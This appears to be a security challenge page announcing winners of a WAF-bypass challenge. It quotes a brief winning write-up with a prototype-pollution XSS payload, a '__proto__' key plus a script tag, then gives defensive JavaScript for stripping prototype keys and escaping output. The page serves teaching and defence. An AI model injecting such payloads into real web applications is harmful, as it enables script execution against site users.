DOJO Challenge #7 was about finding a valid WAF bypass to exploit an XSS via a prototype pollution vulnerability.
WINNERS!
We are glad to announce the #7 DOJO Challenge winners list.
March 12, 2021
Subscribe to our Twitter or LinkedIn feeds to be notified of upcoming challenges.
Read on to find the best write-up as well as the challenge author’s recommendations.
You had an input field that you could inject into, but many characters were sanitized and the WAF could detect them. The goal was to get around that WAF and find a way to exploit an XSS.
We asked you to produce a qualified write-up report explaining the logic allowing such exploitation. This write-up serves two purposes:
Zomsop82's report was detailed, informative, and good at explaining the WAF exploitation logic.
The other reports, notably Marcosen's and ivarsvids's, were also very nice. We're sorry we can't publish them all, because that's where you clearly witness the outstanding creativity of our community.
Thank you all for playing with us!
————– START OF Zomsop82 REPORT ——————
The website allows the user to control a JavaScript variable named “config”, which can be used to perform reflected XSS.
It is noted that a “WAF” is in place to avoid XSS but can be bypassed.
Final payload is:
{"__proto__":[], "name": "<script>alert(1)</script>"}
————– END OF Zomsop82 REPORT ——————
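For defenders, here is how a `__proto__` key like the one in the payload above behaves once it has been through `JSON.parse`, and one way to neutralise it before the value reaches the page. This is an added example, not the challenge's code (which this page does not show); `naiveMerge`, `safeParse`, `safeMerge`, `escapeHtml` and `demo` are hypothetical names, and the allow-list of config keys is an assumption.

```javascript
// Constructed sample input: the payload quoted in the report above.
const SAMPLE = '{"__proto__":[], "name": "<script>alert(1)</script>"}';

const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Hypothetical naive merge. JSON.parse creates "__proto__" as an ordinary own
// key, but assigning target["__proto__"] here invokes the inherited setter
// and swaps the prototype of the target object.
function naiveMerge(target, source) {
  for (const key of Object.keys(source)) {
    target[key] = source[key];
  }
  return target;
}

// Hardened parse: a reviver that returns undefined deletes the property,
// so prototype-related keys are dropped at every nesting depth.
function safeParse(json) {
  return JSON.parse(json, (key, value) =>
    FORBIDDEN_KEYS.has(key) ? undefined : value);
}

// Hardened merge: copy only allow-listed own keys into a prototype-less object.
function safeMerge(source, allowedKeys) {
  const out = Object.create(null);
  for (const key of allowedKeys) {
    if (Object.prototype.hasOwnProperty.call(source, key)) out[key] = source[key];
  }
  return out;
}

// Encode for an HTML text context so markup in the value is rendered inert.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

function demo() {
  const parsed = JSON.parse(SAMPLE);
  const polluted = naiveMerge({}, parsed);
  const safe = safeMerge(safeParse(SAMPLE), ["name"]);
  return {
    ownProtoKey: Object.prototype.hasOwnProperty.call(parsed, "__proto__"),
    pollutedLooksLikeArray: polluted instanceof Array, // type checks built on instanceof are fooled
    pollutedIsRealArray: Array.isArray(polluted),
    safeProto: Object.getPrototypeOf(safe),
    rendered: escapeHtml(safe.name),
  };
}
```

Any sanitising step that branches on the apparent type of the merged object should use checks such as `Array.isArray` that do not follow the prototype chain, and output encoding should be applied regardless of what earlier filters decided.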